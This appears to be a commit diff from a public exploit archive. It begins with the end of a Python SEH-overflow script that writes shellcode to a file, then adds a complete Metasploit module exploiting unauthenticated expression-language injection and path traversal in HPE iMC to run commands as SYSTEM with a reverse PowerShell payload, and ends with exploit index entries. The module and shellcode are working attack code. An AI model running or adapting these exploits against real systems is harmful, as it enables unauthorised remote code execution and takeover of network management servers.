shellcode += "\x38\xbd\xaf\xbe\xc0\x3a\xaf\xca\xc5\x07\x77\x26"
shellcode += "\xb7\x18\x12\x48\x64\x18\x37\x2b\xeb\x8a\xdb\x82"
shellcode += "\x8e\x2a\x79\xdb"
evil = buffer + nseh + seh + nop + shellcode
file = open('open.txt','w+')
file.write(evil)
file.close()

115
exploits/windows/remote/44648.rb Executable file
View file

@ -0,0 +1,115 @@
# Exploit Title: HPE iMC EL Injection Unauthenticated RCE
# Date: 6 February, 2018
# Exploit Author: TrendyTofu
# Vendor Homepage: https://www.hpe.com/us/en/home.html
# Software Link: http://h10145.www1.hpe.com/Downloads/SoftwareReleases.aspx?ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535
# Version: prior to 7.3 E0504P04
# Tested on: iMC PLAT v7.3 (E0504P02), Windows Server 2012R2 x64 (EN)
# CVE : CVE-2017-8982, CVE-2017-12500
# Reference:
https://www.thezdi.com/blog/2018/2/6/one-mans-patch-is-another-mans-treasure-a-tale-of-a-failed-hpe-patch
Metasploit module also hosted on Github. Posted below for reference:
https://raw.githubusercontent.com/thezdi/scripts/master/msf/hp_imc_el_injection_rce.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'HPE iMC EL Injection Unauthenticated RCE',
'Description' => %q{
This module exploits an expression language injection
vulnerablity, along with
an authentication bypass vulnerability in Hewlett Packard
Enterprise Intelligent
Management Center before version 7.3 E0504P04 to achieve
remote code execution.
The HP iMC server suffers from multiple vulnerabilities allows
unauthenticated
attacker to execute arbitrary Expression Language via the
beanName parameter,
allowing execution of arbitrary operating system commands as
SYSTEM. This service
listens on TCP port 8080 and 8443 by default.
This module has been tested successfully on iMC PLAT v7.3
(E0504P02) on Windows
2k12r2 x64 (EN).
},
'License' => MSF_LICENSE,
'Author' =>
[
'mr_me', # Discovery
'trendytofu' # Metasploit
],
'References' =>
[
['CVE', '2017-8982'],
['ZDI', '18-139'],
['URL',
'https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03809en_us'],
['CVE', '2017-12500'],
['ZDI', '17-663'],
['URL',
'https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03768en_us']
],
'Platform' => 'win',
'Arch' => ARCH_CMD,
'Targets' => [
[ 'Windows',
{
'Arch' => [ ARCH_CMD],
'Platform' => 'win'
}
]
],
'Privileged' => true,
'DisclosureDate' => 'Jan 25 2018',
'DefaultOptions' =>
{
'Payload' => 'cmd/windows/reverse_powershell'
},
'DefaultTarget' => 0))
register_options [Opt::RPORT(8080)]
end
def check
res = send_request_raw({'uri' => '/imc/login.jsf' })
return CheckCode::Detected if res && res.code == 200
CheckCode::Unknown
end
def get_payload(cmd)
%q|facesContext.getExternalContext().redirect(%22%22.getClass().forName(%22javax.script.ScriptEngineManager%22).newInstance().getEngineByName(%22JavaScript%22).eval(%22var%20proc=new%20java.lang.ProcessBuilder[%5C%22(java.lang.String[])%5C%22]([%5C%22cmd.exe%5C%22,%5C%22/c%5C%22,%5C%22|+cmd+%q|%5C%22]).start();%22))|
end
def execute_command(payload)
res = send_request_raw({ 'uri' =>
"/imc/primepush/%2e%2e/ict/export/ictExpertDownload.xhtml?beanName=#{payload}"
})
fail_with(Msf::Module::Failure::UnexpectedReply, "Injection
failed") if res && res.code != 302
print_good "Command injected successfully!"
end
def exploit
cmd = payload.encoded
cmd.gsub!('cmd.exe /c ','')
cmd = Rex::Text.uri_encode(cmd)
print_status "Sending payload..."
execute_command get_payload cmd
end
end

22
files_exploits.csv
View file

@ -5313,7 +5313,7 @@ id,file,description,date,author,type,platform,port
40787,exploits/windows/dos/40787.html,"Microsoft Edge - 'Array.splice' Heap Overflow",2016-11-18,"Google Security Research",dos,windows,
40779,exploits/windows/dos/40779.py,"Moxa SoftCMS 1.5 - Denial of Service (PoC)",2016-11-18,"Zhou Yu",dos,windows,
40784,exploits/windows/dos/40784.html,"Microsoft Edge - 'FillFromPrototypes' Type Confusion",2016-11-18,"Google Security Research",dos,windows,
40785,exploits/windows/dos/40785.html,"Microsoft Edge - 'Array.filter' Info Leak",2016-11-18,"Google Security Research",dos,windows,
40785,exploits/windows/dos/40785.html,"Microsoft Edge - 'Array.filter' Information Leak",2016-11-18,"Google Security Research",dos,windows,
40786,exploits/windows/dos/40786.html,"Microsoft Edge - 'Array.reverse' Overflow",2016-11-18,"Google Security Research",dos,windows,
40790,exploits/linux/dos/40790.txt,"Palo Alto Networks PanOS - appweb3 Stack Buffer Overflow",2016-11-18,"Google Security Research",dos,linux,
40793,exploits/windows/dos/40793.html,"Microsoft Edge Scripting Engine - Memory Corruption (MS16-129)",2016-11-21,Security-Assessment.com,dos,windows,
@ -5973,6 +5973,7 @@ id,file,description,date,author,type,platform,port
44619,exploits/windows/dos/44619.cpp,"2345 Security Guard 3.7 - '2345NsProtect.sys' Denial of Service",2018-05-14,anhkgg,dos,windows,
44629,exploits/ios/dos/44629.py,"WhatsApp 2.18.31 - Memory Corruption",2018-05-16,"Juan Sacco",dos,ios,
44641,exploits/linux/dos/44641.c,"Linux < 4.16.9 / < 4.14.41 - 4-byte Infoleak via Uninitialized Struct Field in compat adjtimex Syscall",2018-05-17,"Google Security Research",dos,linux,
44653,exploits/windows/dos/44653.js,"Microsoft Edge Chakra JIT - Bound Check Elimination Bug",2018-05-18,"Google Security Research",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -9708,14 +9709,18 @@ id,file,description,date,author,type,platform,port
44564,exploits/windows/local/44564.py,"LibreOffice/Open Office - '.odt' Information Disclosure",2018-05-02,"Richard Davy",local,windows,
44565,exploits/windows/local/44565.py,"Easy MPEG to DVD Burner 1.7.11 - Local Buffer Overflow (SEH)",2018-05-02,"Marwan Shamel",local,windows,
44573,exploits/windows/local/44573.txt,"Adobe Reader PDF - Client Side Request Injection",2018-05-02,"Alex Inführ",local,windows,
44581,exploits/windows/local/44581.c,"Windows - Local Privilege Escalation",2018-04-24,XPN,local,windows,
44586,exploits/windows_x86-64/local/44586.rb,"Windows WMI - Recieve Notification Exploit (Metasploit)",2018-05-04,Metasploit,local,windows_x86-64,
44581,exploits/windows/local/44581.c,"Microsoft Windows - Local Privilege Escalation",2018-04-24,XPN,local,windows,
44586,exploits/windows_x86-64/local/44586.rb,"Microsoft Windows WMI - Recieve Notification Exploit (Metasploit)",2018-05-04,Metasploit,local,windows_x86-64,
44590,exploits/windows/local/44590.txt,"DeviceLock Plug and Play Auditor 5.72 - Unicode Buffer Overflow (SEH)",2018-05-06,hyp3rlinx,local,windows,
44601,exploits/linux/local/44601.txt,"GNU wget - Cookie Injection",2018-05-06,"Harry Sintonen",local,linux,
44603,exploits/windows/local/44603.txt,"Microsoft Windows FxCop 10/12 - XML External Entity Injection",2018-05-09,hyp3rlinx,local,windows,
44614,exploits/windows/local/44614.txt,"EMC RecoverPoint 4.3 - 'Admin CLI' Command Injection",2018-05-11,"Paul Taylor",local,windows,
44630,exploits/windows/local/44630.txt,"Microsoft Windows - Token Process Trust SID Access Check Bypass Privilege Escalation",2018-05-16,"Google Security Research",local,windows,
44633,exploits/linux/local/44633.rb,"Libuser - 'roothelper' Privilege Escalation (Metasploit)",2018-05-16,Metasploit,local,linux,
44644,exploits/hardware/local/44644.txt,"Microsoft Xbox One 10.0.14393.2152 - Code Execution (PoC)",2017-03-31,unknownv2,local,hardware,
44649,exploits/windows/local/44649.py,"Prime95 29.4b8 - Stack Buffer Overflow (SEH)",2018-05-18,crash_manucoot,local,windows,
44652,exploits/linux/local/44652.py,"DynoRoot DHCP - Client Command Injection",2018-05-18,"Kevin Kirsche",local,linux,
44654,exploits/linux/local/44654.rb,"Linux 4.8.0 < 4.8.0-46 - AF_PACKET packet_set_ring Privilege Escalation (Metasploit)",2018-05-18,Metasploit,local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16146,7 +16151,7 @@ id,file,description,date,author,type,platform,port
40949,exploits/cgi/remote/40949.rb,"NETGEAR WNR2000v5 - Remote Code Execution",2016-12-21,"Pedro Ribeiro",remote,cgi,80
40963,exploits/linux/remote/40963.txt,"OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading",2016-12-23,"Google Security Research",remote,linux,22
40984,exploits/windows/remote/40984.py,"Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH)",2017-01-02,"Fady Mohammed Osman",remote,windows,
40990,exploits/windows/remote/40990.txt,"Microsoft Edge (Windows 10) - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution",2017-01-05,"Brian Pak",remote,windows,
40990,exploits/windows/remote/40990.txt,"Microsoft Edge (Windows 10) - 'chakra.dll' Information Leak / Type Confusion Remote Code Execution",2017-01-05,"Brian Pak",remote,windows,
41003,exploits/windows/remote/41003.py,"DiskBoss Enterprise 7.5.12 - 'POST' Remote Buffer Overflow (SEH)",2017-01-10,"Wyndell Bibera",remote,windows,
41013,exploits/linux/remote/41013.txt,"Ansible 2.1.4/2.2.1 - Command Execution",2017-01-09,Computest,remote,linux,
41041,exploits/linux/remote/41041.rb,"Cisco Firepower Management Console 6.0 - Post Authentication UserAdd (Metasploit)",2017-01-13,Metasploit,remote,linux,
@ -16217,7 +16222,7 @@ id,file,description,date,author,type,platform,port
43927,exploits/windows/remote/43927.txt,"HPE iMC 7.3 - RMI Java Deserialization",2018-01-30,"Chris Lyne",remote,windows,
43936,exploits/windows/remote/43936.py,"Sync Breeze Enterprise 10.4.18 - Remote Buffer Overflow (SEH)",2018-02-01,"Daniel Teixeira",remote,windows,
43939,exploits/multiple/remote/43939.rb,"BMC Server Automation RSCD Agent - NSH Remote Command Execution (Metasploit)",2018-02-01,Metasploit,remote,multiple,
43970,exploits/windows/remote/43970.rb,"Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010)",2018-02-05,Metasploit,remote,windows,
43970,exploits/windows/remote/43970.rb,"Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010)",2018-02-05,Metasploit,remote,windows,
43982,exploits/hardware/remote/43982.txt,"Geovision Inc. IP Camera/Video/Access Control - Multiple Remote Command Execution / Stack Overflow / Double Free / Unauthorized Access",2018-02-01,bashis,remote,hardware,
43983,exploits/hardware/remote/43983.py,"Geovision Inc. IP Camera & Video - Remote Command Execution",2018-02-01,bashis,remote,hardware,
43984,exploits/multiple/remote/43984.txt,"Axis SSI - Remote Command Execution / Read Files",2017-10-20,bashis,remote,multiple,
@ -16495,6 +16500,7 @@ id,file,description,date,author,type,platform,port
44638,exploits/windows/remote/44638.txt,"Nanopool Claymore Dual Miner 7.3 - Remote Code Execution",2018-05-17,ReverseBrain,remote,windows,
44642,exploits/linux/remote/44642.rb,"Jenkins CLI - HTTP Java Deserialization (Metasploit)",2018-05-17,Metasploit,remote,linux,8080
44643,exploits/multiple/remote/44643.rb,"Apache Struts 2 - Struts 1 Plugin Showcase OGNL Code Execution (Metasploit)",2018-05-17,Metasploit,remote,multiple,8080
44648,exploits/windows/remote/44648.rb,"HPE iMC 7.3 - Remote Code Execution (Metasploit)",2018-05-18,TrendyTofu,remote,windows,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -39329,3 +39335,9 @@ id,file,description,date,author,type,platform,port
44637,exploits/hardware/webapps/44637.py,"Intelbras NCLOUD 300 1.0 - Authentication bypass",2018-05-17,"Pedro Aguiar",webapps,hardware,
44639,exploits/php/webapps/44639.txt,"SuperCom Online Shopping Ecommerce Cart 1 - Persistent Cross-Site scripting / Cross site request forgery / Authentication bypass",2018-05-17,L0RD,webapps,php,
44640,exploits/linux/webapps/44640.txt,"Powerlogic/Schneider Electric IONXXXX Series - Cross-Site Request Forgery",2018-05-17,t4rkd3vilz,webapps,linux,
44645,exploits/php/webapps/44645.txt,"Healwire Online Pharmacy 3.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2018-05-18,L0RD,webapps,php,
44646,exploits/php/webapps/44646.txt,"Monstra CMS before 3.0.4 - Cross-Site Scripting",2018-05-18,"Berk Dusunur",webapps,php,
44647,exploits/linux/webapps/44647.txt,"SAP NetWeaver Web Dynpro 6.4 < 7.5 - Information Disclosure",2018-05-18,"Richard Alviarez",webapps,linux,
44651,exploits/php/webapps/44651.txt,"Infinity Market Classified Ads Script 1.6.2 - Cross-Site Request Forgery",2018-05-18,L0RD,webapps,php,
44650,exploits/hardware/webapps/44650.txt,"Cisco SA520W Security Appliance - Path Traversal",2018-05-18,"Nassim Asrir",webapps,hardware,
44655,exploits/linux/webapps/44655.txt,"SAP B2B / B2C CRM 2.x < 4.x - Local File Inclusion",2018-05-18,"Richard Alviarez",webapps,linux,

Can't render this file because it is too large.